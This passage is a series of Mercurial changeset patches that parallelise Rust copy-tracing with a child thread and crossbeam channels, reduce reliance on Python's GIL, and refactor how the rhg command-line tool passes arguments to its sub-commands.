- let rev_info_maker: RevInfoMaker<PyBytes> = - Box::new(|rev: Revision, d: &mut DataHolder<PyBytes>| -> RevInfo { - let res: PyTuple = rev_info - .call(py, (rev,), None) - .expect("rust-copy-tracing: python call to `rev_info` failed") - .cast_into(py) - .expect( - "rust-copy_tracing: python call to `rev_info` returned \ - unexpected non-Tuple value", - ); - let p1 = res.get_item(py, 0).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - let p2 = res.get_item(py, 1).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - - let files = match res.get_item(py, 2).extract::<PyBytes>(py) { - Ok(raw) => { - // Give responsability for the raw bytes lifetime to - // hg-core - d.data = Some(raw); - let addrs = d.data.as_ref().expect( - "rust-copy-tracing: failed to get a reference to the \ - raw bytes for copy data").data(py); - ChangedFiles::new(addrs) - } - // value was presumably None, meaning they was no copy data. 
- Err(_) => ChangedFiles::new_empty(), - }; - - (p1, p2, files) - }); - let children_count: PyResult<_> = children_count + let children_count = children_count .items(py) .iter() .map(|(k, v)| Ok((k.extract(py)?, v.extract(py)?))) - .collect(); + .collect::<PyResult<_>>()?; + + /// (Revision number, parent 1, parent 2, copy data for this revision) + type RevInfo = (Revision, Revision, Revision, Option<PyBytes>); + + let revs_info = revs.iter(py).map(|rev_py| -> PyResult<RevInfo> { + let rev = rev_py.extract(py)?; + let tuple: PyTuple = + rev_info.call(py, (rev_py,), None)?.cast_into(py)?; + let p1 = tuple.get_item(py, 0).extract(py)?; + let p2 = tuple.get_item(py, 1).extract(py)?; + let opt_bytes = tuple.get_item(py, 2).extract(py)?; + Ok((rev, p1, p2, opt_bytes)) + }); - let res = combine_changeset_copies( - revs?, - children_count?, - target_rev, - rev_info_maker, - ); + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let files = match &opt_bytes { + Some(bytes) => ChangedFiles::new(bytes.data(py)), + // value was presumably None, meaning they was no copy data. + None => ChangedFiles::new_empty(), + }; + + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + let path_copies = combine_changeset_copies.finish(target_rev); let out = PyDict::new(py); - for (dest, source) in res.into_iter() { + for (dest, source) in path_copies.into_iter() { out.set_item( py, PyBytes::new(py, &dest.into_vec()), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609938541 -3600 # Wed Jan 06 14:09:01 2021 +0100 # Node ID 47557ea79fc77fa6ac7d4aa2888a0b84a601300c # Parent cb4b0b0c6de4b8d87f62e0a265628d003cd1c10c copies-rust: move CPU-heavy Rust processing into a child thread … that runs in parallel with the parent thread fetching data. This can be disabled through a new config. 
CLI example: hg --config=devel.copy-tracing.multi-thread=no For now both threads use the GIL, later commits will reduce this. Differential Revision: https://phab.mercurial-scm.org/D9684 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -700,6 +700,11 @@ ) coreconfigitem( b'devel', + b'copy-tracing.multi-thread', + default=True, +) +coreconfigitem( + b'devel', b'debug.extensions', default=False, ) diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -274,6 +274,7 @@ revs = cl.findmissingrevs(common=[a.rev()], heads=[b.rev()]) roots = set() has_graph_roots = False + multi_thread = repo.ui.configbool(b'devel', b'copy-tracing.multi-thread') # iterate over `only(B, A)` for r in revs: @@ -321,7 +322,13 @@ children_count[p] += 1 revinfo = _revinfo_getter(repo, match) return _combine_changeset_copies( - revs, children_count, b.rev(), revinfo, match, isancestor + revs, + children_count, + b.rev(), + revinfo, + match, + isancestor, + multi_thread, ) else: # When not using side-data, we will process the edges "from" the parent. 
@@ -346,7 +353,7 @@ def _combine_changeset_copies( - revs, children_count, targetrev, revinfo, match, isancestor + revs, children_count, targetrev, revinfo, match, isancestor, multi_thread ): """combine the copies information for each item of iterrevs @@ -363,7 +370,7 @@ if rustmod is not None: final_copies = rustmod.combine_changeset_copies( - list(revs), children_count, targetrev, revinfo + list(revs), children_count, targetrev, revinfo, multi_thread ) else: isancestor = cached_is_ancestor(isancestor) diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -331,6 +331,7 @@ version = "0.1.0" dependencies = [ "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", "hg-core 0.1.0", "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ b/rust/hg-cpython/Cargo.toml @@ -22,6 +22,7 @@ python3-bin = ["cpython/python3-sys"] [dependencies] +crossbeam-channel = "0.4" hg-core = { path = "../hg-core"} libc = '*' log = "0.4.8" diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -22,6 +22,7 @@ children_count: PyDict, target_rev: Revision, rev_info: PyObject, + multi_thread: bool, ) -> PyResult<PyDict> { let children_count = children_count .items(py) @@ -42,20 +43,81 @@ Ok((rev, p1, p2, opt_bytes)) }); - let mut combine_changeset_copies = - CombineChangesetCopies::new(children_count); + let path_copies = if !multi_thread { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let files = match &opt_bytes { + Some(bytes) 
=> ChangedFiles::new(bytes.data(py)), + // Python None was extracted to Option::None, + // meaning there was no copy data. + None => ChangedFiles::new_empty(), + }; + + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + combine_changeset_copies.finish(target_rev) + } else { + // Use a bounded channel to provide back-pressure: + // if the child thread is slower to process revisions than this thread + // is to gather data for them, an unbounded channel would keep + // growing and eat memory. + // + // TODO: tweak the bound? + let (rev_info_sender, rev_info_receiver) = + crossbeam_channel::bounded::<RevInfo>(1000); - for rev_info in revs_info { - let (rev, p1, p2, opt_bytes) = rev_info?; - let files = match &opt_bytes { - Some(bytes) => ChangedFiles::new(bytes.data(py)), - // value was presumably None, meaning they was no copy data. - None => ChangedFiles::new_empty(), - }; + // Start a thread that does CPU-heavy processing in parallel with the + // loop below. + // + // If the parent thread panics, `rev_info_sender` will be dropped and + // “disconnected”. `rev_info_receiver` will be notified of this and + // exit its own loop. + let thread = std::thread::spawn(move || { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + for (rev, p1, p2, opt_bytes) in rev_info_receiver { + let gil = Python::acquire_gil(); + let py = gil.python(); + let files = match &opt_bytes { + Some(raw) => ChangedFiles::new(raw.data(py)), + // Python None was extracted to Option::None, + // meaning there was no copy data. 
+ None => ChangedFiles::new_empty(), + }; + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + + combine_changeset_copies.finish(target_rev) + }); - combine_changeset_copies.add_revision(rev, p1, p2, files) - } - let path_copies = combine_changeset_copies.finish(target_rev); + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + py.allow_threads(|| { + rev_info_sender.send((rev, p1, p2, opt_bytes)).expect( + "combine_changeset_copies: channel is disconnected", + ); + }); + } + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + py.allow_threads(|| { + // Disconnect the channel to signal the child thread to stop: + // the `for … in rev_info_receiver` loop will end. + drop(rev_info_sender); + + // Wait for the child thread to stop, and propagate any panic. + thread.join().unwrap_or_else(|panic_payload| { + std::panic::resume_unwind(panic_payload) + }) + }) + }; + let out = PyDict::new(py); for (dest, source) in path_copies.into_iter() { out.set_item( @@ -84,7 +146,8 @@ revs: PyList, children: PyDict, target_rev: Revision, - rev_info: PyObject + rev_info: PyObject, + multi_thread: bool ) ), )?; # HG changeset patch # User Simon Sapin <simon-commits@exyr.org> # Date 1606411431 -3600 # Thu Nov 26 18:23:51 2020 +0100 # Node ID 620c88fb42a24c901a34c1e0028fc5f4e16ba9b4 # Parent 47557ea79fc77fa6ac7d4aa2888a0b84a601300c copies-rust: introduce PyBytesWithData to reduce GIL requirement See explanations in new doc-comments. 
Differential Revision: https://phab.mercurial-scm.org/D9685 diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -12,6 +12,55 @@ use hg::copy_tracing::CombineChangesetCopies; use hg::Revision; +use self::pybytes_with_data::PyBytesWithData; + +// Module to encapsulate private fields +mod pybytes_with_data { + use cpython::{PyBytes, Python}; + + /// Safe abstraction over a `PyBytes` together with the `&[u8]` slice + /// that borrows it. + /// + /// Calling `PyBytes::data` requires a GIL marker but we want to access the + /// data in a thread that (ideally) does not need to acquire the GIL. + /// This type allows separating the call an the use. + pub(super) struct PyBytesWithData { + #[allow(unused)] + keep_alive: PyBytes, + + /// Borrows the buffer inside `self.keep_alive`, + /// but the borrow-checker cannot express self-referential structs. + data: *const [u8], + } + + fn require_send<T: Send>() {} + + #[allow(unused)] + fn static_assert_pybytes_is_send() { + require_send::<PyBytes>; + } + + // Safety: PyBytes is Send. Raw pointers are not by default, + // but here sending one to another thread is fine since we ensure it stays + // valid. + unsafe impl Send for PyBytesWithData {} + + impl PyBytesWithData { + pub fn new(py: Python, bytes: PyBytes) -> Self { + Self { + data: bytes.data(py), + keep_alive: bytes, + } + } + + pub fn data(&self) -> &[u8] { + // Safety: the raw pointer is valid as long as the PyBytes is still + // alive, and the returned slice borrows `self`. + unsafe { &*self.data } + } + } +} + /// Combines copies information contained into revision `revs` to build a copy /// map. 
/// @@ -31,17 +80,18 @@ .collect::<PyResult<_>>()?; /// (Revision number, parent 1, parent 2, copy data for this revision) - type RevInfo = (Revision, Revision, Revision, Option<PyBytes>); + type RevInfo<Bytes> = (Revision, Revision, Revision, Option<Bytes>); - let revs_info = revs.iter(py).map(|rev_py| -> PyResult<RevInfo> { - let rev = rev_py.extract(py)?; - let tuple: PyTuple = - rev_info.call(py, (rev_py,), None)?.cast_into(py)?; - let p1 = tuple.get_item(py, 0).extract(py)?; - let p2 = tuple.get_item(py, 1).extract(py)?; - let opt_bytes = tuple.get_item(py, 2).extract(py)?; - Ok((rev, p1, p2, opt_bytes)) - }); + let revs_info = + revs.iter(py).map(|rev_py| -> PyResult<RevInfo<PyBytes>> { + let rev = rev_py.extract(py)?; + let tuple: PyTuple = + rev_info.call(py, (rev_py,), None)?.cast_into(py)?; + let p1 = tuple.get_item(py, 0).extract(py)?; + let p2 = tuple.get_item(py, 1).extract(py)?; + let opt_bytes = tuple.get_item(py, 2).extract(py)?; + Ok((rev, p1, p2, opt_bytes)) + }); let path_copies = if !multi_thread { let mut combine_changeset_copies = @@ -67,7 +117,7 @@ // // TODO: tweak the bound? let (rev_info_sender, rev_info_receiver) = - crossbeam_channel::bounded::<RevInfo>(1000); + crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000); // Start a thread that does CPU-heavy processing in parallel with the // loop below. @@ -79,15 +129,16 @@ let mut combine_changeset_copies = CombineChangesetCopies::new(children_count); for (rev, p1, p2, opt_bytes) in rev_info_receiver { - let gil = Python::acquire_gil(); - let py = gil.python(); let files = match &opt_bytes { - Some(raw) => ChangedFiles::new(raw.data(py)), + Some(raw) => ChangedFiles::new(raw.data()), // Python None was extracted to Option::None, // meaning there was no copy data. None => ChangedFiles::new_empty(), }; combine_changeset_copies.add_revision(rev, p1, p2, files) + + // The GIL is (still) implicitly acquired here through + // `impl Drop for PyBytes`. 
} combine_changeset_copies.finish(target_rev) @@ -95,6 +146,7 @@ for rev_info in revs_info { let (rev, p1, p2, opt_bytes) = rev_info?; + let opt_bytes = opt_bytes.map(|b| PyBytesWithData::new(py, b)); // We’d prefer to avoid the child thread calling into Python code, // but this avoids a potential deadlock on the GIL if it does: # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609879581 -3600 # Tue Jan 05 21:46:21 2021 +0100 # Node ID 8d20abed6a1e1b4d95a9da626651d45102ec05c0 # Parent 620c88fb42a24c901a34c1e0028fc5f4e16ba9b4 copies-rust: send PyBytes values back be dropped ino the parent thread … instead of acquiring the GIL in the Rust thread in the Drop impl This commit is based on the premise that crossbeam-channel with unbounded send and non-blocking receive is faster than a contended GIL, but that remains to be measured. Differential Revision: https://phab.mercurial-scm.org/D9686 diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -1,6 +1,7 @@ use cpython::ObjectProtocol; use cpython::PyBytes; use cpython::PyDict; +use cpython::PyDrop; use cpython::PyList; use cpython::PyModule; use cpython::PyObject; @@ -58,6 +59,10 @@ // alive, and the returned slice borrows `self`. 
unsafe { &*self.data } } + + pub fn unwrap(self) -> PyBytes { + self.keep_alive + } } } @@ -93,7 +98,8 @@ Ok((rev, p1, p2, opt_bytes)) }); - let path_copies = if !multi_thread { + let path_copies; + if !multi_thread { let mut combine_changeset_copies = CombineChangesetCopies::new(children_count); @@ -108,7 +114,7 @@ combine_changeset_copies.add_revision(rev, p1, p2, files) } - combine_changeset_copies.finish(target_rev) + path_copies = combine_changeset_copies.finish(target_rev) } else { // Use a bounded channel to provide back-pressure: // if the child thread is slower to process revisions than this thread @@ -119,6 +125,13 @@ let (rev_info_sender, rev_info_receiver) = crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000); + // This channel (going the other way around) however is unbounded. + // If they were both bounded, there might potentially be deadlocks + // where both channels are full and both threads are waiting on each + // other. + let (pybytes_sender, pybytes_receiver) = + crossbeam_channel::unbounded(); + // Start a thread that does CPU-heavy processing in parallel with the // loop below. // @@ -135,10 +148,20 @@ // meaning there was no copy data. None => ChangedFiles::new_empty(), }; - combine_changeset_copies.add_revision(rev, p1, p2, files) + combine_changeset_copies.add_revision(rev, p1, p2, files); - // The GIL is (still) implicitly acquired here through - // `impl Drop for PyBytes`. + // Send `PyBytes` back to the parent thread so the parent + // thread can drop it. Otherwise the GIL would be implicitly + // acquired here through `impl Drop for PyBytes`. + if let Some(bytes) = opt_bytes { + if let Err(_) = pybytes_sender.send(bytes.unwrap()) { + // The channel is disconnected, meaning the parent + // thread panicked or returned + // early through + // `?` to propagate a Python exception. 
+ break; + } + } } combine_changeset_copies.finish(target_rev) @@ -155,10 +178,15 @@ "combine_changeset_copies: channel is disconnected", ); }); + + // Drop anything in the channel, without blocking + for pybytes in pybytes_receiver.try_iter() { + pybytes.release_ref(py) + } } // We’d prefer to avoid the child thread calling into Python code, // but this avoids a potential deadlock on the GIL if it does: - py.allow_threads(|| { + path_copies = py.allow_threads(|| { // Disconnect the channel to signal the child thread to stop: // the `for … in rev_info_receiver` loop will end. drop(rev_info_sender); @@ -167,7 +195,12 @@ thread.join().unwrap_or_else(|panic_payload| { std::panic::resume_unwind(panic_payload) }) - }) + }); + + // Drop anything left in the channel + for pybytes in pybytes_receiver.iter() { + pybytes.release_ref(py) + } }; let out = PyDict::new(py); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613145270 -3600 # Fri Feb 12 16:54:30 2021 +0100 # Node ID 21d3b40b4c0eade15db624c7ed3bf1f7ed45c059 # Parent 8d20abed6a1e1b4d95a9da626651d45102ec05c0 rhg: Remove error message on unsupported CLI arguments Like in other "unsupported" cases that return a specific exit code Differential Revision: https://phab.mercurial-scm.org/D10002 diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -33,6 +33,14 @@ } } +/// For now we don’t differenciate between invalid CLI args and valid for `hg` +/// but not supported yet by `rhg`. 
+impl From<clap::Error> for CommandError { + fn from(_: clap::Error) -> Self { + CommandError::Unimplemented + } +} + impl From<HgError> for CommandError { fn from(error: HgError) -> Self { match error { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -33,7 +33,7 @@ ) } -fn main() { +fn main_with_result(ui: &ui::Ui) -> Result<(), CommandError> { env_logger::init(); let app = App::new("rhg") .setting(AppSettings::AllowInvalidUtf8) @@ -43,12 +43,7 @@ let app = add_global_args(app); let app = add_subcommand_args(app); - let ui = ui::Ui::new(); - - let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { - let _ = ui.writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED) - }); + let matches = app.clone().get_matches_safe()?; let (subcommand_name, subcommand_matches) = matches.subcommand(); let run = subcommand_run_fn(subcommand_name) @@ -69,16 +64,18 @@ }; let repo_path = value_of_global_arg("repository").map(Path::new); - let result = (|| -> Result<(), CommandError> { - let config_args = values_of_global_arg("config") - // `get_bytes_from_path` works for OsStr the same as for Path - .map(hg::utils::files::get_bytes_from_path); - let config = hg::config::Config::load(config_args)?; - run(&ui, &config, repo_path, args) - })(); + let config_args = values_of_global_arg("config") + // `get_bytes_from_path` works for OsStr the same as for Path + .map(hg::utils::files::get_bytes_from_path); + let config = hg::config::Config::load(config_args)?; + run(&ui, &config, repo_path, args) +} - let exit_code = match result { - Ok(_) => exitcode::OK, +fn main() { + let ui = ui::Ui::new(); + + let exit_code = match main_with_result(&ui) { + Ok(()) => exitcode::OK, // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. 
diff --git a/rust/rhg/src/ui.rs b/rust/rhg/src/ui.rs --- a/rust/rhg/src/ui.rs +++ b/rust/rhg/src/ui.rs @@ -49,11 +49,6 @@ stderr.flush().or_else(handle_stderr_error) } - - /// Write string line to stderr - pub fn writeln_stderr_str(&self, s: &str) -> Result<(), UiError> { - self.write_stderr(&format!("{}\n", s).as_bytes()) - } } /// A buffered stdout writer for faster batch printing operations. diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -12,12 +12,6 @@ Unimplemented command $ rhg unimplemented-command - error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context - - USAGE: - rhg [OPTIONS] <SUBCOMMAND> - - For more information try --help [252] Finding root # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613415932 -3600 # Mon Feb 15 20:05:32 2021 +0100 # Node ID 80840b651721efa5e194b2c995be5d1210a5eb2c # Parent 21d3b40b4c0eade15db624c7ed3bf1f7ed45c059 rhg: Group values passed to every sub-command into a struct The set of which values this is is evidently not stable yet, so this will make changes easier. Also it is growing, and the function signatures are getting out hand. 
Differential Revision: https://phab.mercurial-scm.org/D10003 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,14 +1,10 @@ use crate::error::CommandError; -use crate::ui::Ui; use clap::Arg; -use clap::ArgMatches; -use hg::config::Config; use hg::operations::cat; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; -use std::path::Path; pub const HELP_TEXT: &str = " Output the current or given revision of files @@ -36,19 +32,14 @@ } #[timed] -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { - let rev = args.value_of("rev"); - let file_args = match args.values_of("files") { +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let rev = invocation.subcommand_args.value_of("rev"); + let file_args = match invocation.subcommand_args.values_of("files") { Some(files) => files.collect(), None => vec![], }; - let repo = Repo::find(config, repo_path)?; + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; @@ -67,7 +58,7 @@ match rev { Some(rev) => { let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; - ui.write_stdout(&data)?; + invocation.ui.write_stdout(&data)?; Ok(()) } None => Err(CommandError::Unimplemented.into()), diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -1,13 +1,9 @@ use crate::error::CommandError; -use crate::ui::Ui; use clap::Arg; -use clap::ArgMatches; use format_bytes::format_bytes; -use hg::config::Config; use hg::errors::HgError; use hg::repo::Repo; use hg::utils::SliceExt; -use std::path::Path; pub const HELP_TEXT: &str = " With one argument of the form section.name, print just the value of that config item. 
@@ -25,20 +21,16 @@ .about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { - let opt_repo = Repo::find_optional(config, repo_path)?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let opt_repo = + Repo::find_optional(invocation.non_repo_config, invocation.repo_path)?; let config = if let Some(repo) = &opt_repo { repo.config() } else { - config + invocation.non_repo_config }; - - let (section, name) = args + let (section, name) = invocation + .subcommand_args .value_of("name") .expect("missing required CLI argument") .as_bytes() @@ -47,6 +39,6 @@ let value = config.get(section, name).unwrap_or(b""); - ui.write_stdout(&format_bytes!(b"{}\n", value))?; + invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) } diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,13 +1,9 @@ use crate::error::CommandError; -use crate::ui::Ui; use clap::Arg; use clap::ArgGroup; -use clap::ArgMatches; -use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; -use std::path::Path; pub const HELP_TEXT: &str = " Dump the contents of a data file revision @@ -42,12 +38,8 @@ } #[timed] -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let args = invocation.subcommand_args; let rev = args .value_of("rev") .expect("rev should be a required argument"); @@ -63,10 +55,10 @@ } }; - let repo = Repo::find(config, repo_path)?; + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; - let mut stdout = ui.stdout_buffer(); + let mut stdout = 
invocation.ui.stdout_buffer(); stdout.write_all(&data)?; stdout.flush()?; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,9 +1,5 @@ use crate::error::CommandError; -use crate::ui::Ui; -use clap::ArgMatches; -use hg::config::Config; use hg::repo::Repo; -use std::path::Path; pub const HELP_TEXT: &str = " Print the current repo requirements. @@ -13,13 +9,8 @@ clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - _args: &ArgMatches, -) -> Result<(), CommandError> { - let repo = Repo::find(config, repo_path)?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); @@ -27,6 +18,6 @@ output.push_str(req); output.push('\n'); } - ui.write_stdout(output.as_bytes())?; + invocation.ui.write_stdout(output.as_bytes())?; Ok(()) } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,14 +1,11 @@ use crate::error::CommandError; use crate::ui::Ui; use clap::Arg; -use clap::ArgMatches; -use hg::config::Config; use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; -use std::path::Path; pub const HELP_TEXT: &str = " List tracked files. 
@@ -29,23 +26,18 @@ .about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - args: &ArgMatches, -) -> Result<(), CommandError> { - let rev = args.value_of("rev"); +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let rev = invocation.subcommand_args.value_of("rev"); - let repo = Repo::find(config, repo_path)?; + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; if let Some(rev) = rev { let files = list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; - display_files(ui, &repo, files.iter()) + display_files(invocation.ui, &repo, files.iter()) } else { let distate = Dirstate::new(&repo)?; let files = distate.tracked_files()?; - display_files(ui, &repo, files) + display_files(invocation.ui, &repo, files) } } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,11 +1,7 @@ use crate::error::CommandError; -use crate::ui::Ui; -use clap::ArgMatches; use format_bytes::format_bytes; -use hg::config::Config; use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; -use std::path::Path; pub const HELP_TEXT: &str = " Print the root directory of the current repository. 
@@ -17,14 +13,11 @@ clap::SubCommand::with_name("root").about(HELP_TEXT) } -pub fn run( - ui: &Ui, - config: &Config, - repo_path: Option<&Path>, - _args: &ArgMatches, -) -> Result<(), CommandError> { - let repo = Repo::find(config, repo_path)?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + invocation + .ui + .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; Ok(()) } diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,9 +1,11 @@ extern crate log; +use crate::ui::Ui; use clap::App; use clap::AppSettings; use clap::Arg; use clap::ArgMatches; use format_bytes::format_bytes; +use hg::config::Config; use std::path::Path; mod error; @@ -48,31 +50,41 @@ let (subcommand_name, subcommand_matches) = matches.subcommand(); let run = subcommand_run_fn(subcommand_name) .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired"); - let args = subcommand_matches + let subcommand_args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); // Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. // `hg log -R ./foo` - let value_of_global_arg = - |name| args.value_of_os(name).or_else(|| matches.value_of_os(name)); + let value_of_global_arg = |name| { + subcommand_args + .value_of_os(name) + .or_else(|| matches.value_of_os(name)) + }; // For arguments where multiple occurences are allowed, return a // possibly-iterator of all values. 
let values_of_global_arg = |name: &str| { let a = matches.values_of_os(name).into_iter().flatten(); - let b = args.values_of_os(name).into_iter().flatten(); + let b = subcommand_args.values_of_os(name).into_iter().flatten(); a.chain(b) }; - let repo_path = value_of_global_arg("repository").map(Path::new); let config_args = values_of_global_arg("config") // `get_bytes_from_path` works for OsStr the same as for Path .map(hg::utils::files::get_bytes_from_path); - let config = hg::config::Config::load(config_args)?; - run(&ui, &config, repo_path, args) + let non_repo_config = &hg::config::Config::load(config_args)?; + + let repo_path = value_of_global_arg("repository").map(Path::new); + + run(&CliInvocation { + ui, + subcommand_args, + non_repo_config, + repo_path, + }) } fn main() { - let ui = ui::Ui::new(); + let ui = Ui::new(); let exit_code = match main_with_result(&ui) { Ok(()) => exitcode::OK, @@ -109,12 +121,9 @@ )+ } - fn subcommand_run_fn(name: &str) -> Option<fn( - &ui::Ui, - &hg::config::Config, - Option<&Path>, - &ArgMatches, - ) -> Result<(), CommandError>> { + pub type RunFn = fn(&CliInvocation) -> Result<(), CommandError>; + + fn subcommand_run_fn(name: &str) -> Option<RunFn> { match name { $( stringify!($command) => Some(commands::$command::run), @@ -133,3 +142,9 @@ root config } +pub struct CliInvocation<'a> { + ui: &'a Ui, + subcommand_args: &'a ArgMatches<'a>, + non_repo_config: &'a Config, + repo_path: Option<&'a Path>, +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613416389 -3600 # Mon Feb 15 20:13:09 2021 +0100 # Node ID 5ce2aa7c2ad50a996a1b1657754f2ba89c799fa9 # Parent 80840b651721efa5e194b2c995be5d1210a5eb2c rhg: Move `Repo` object creation into `main()` … rather than in each sub-command that needs a local repository. This will allow accessing e.g. `.hg/blackbox.log` before dispatching to sub-commands. 
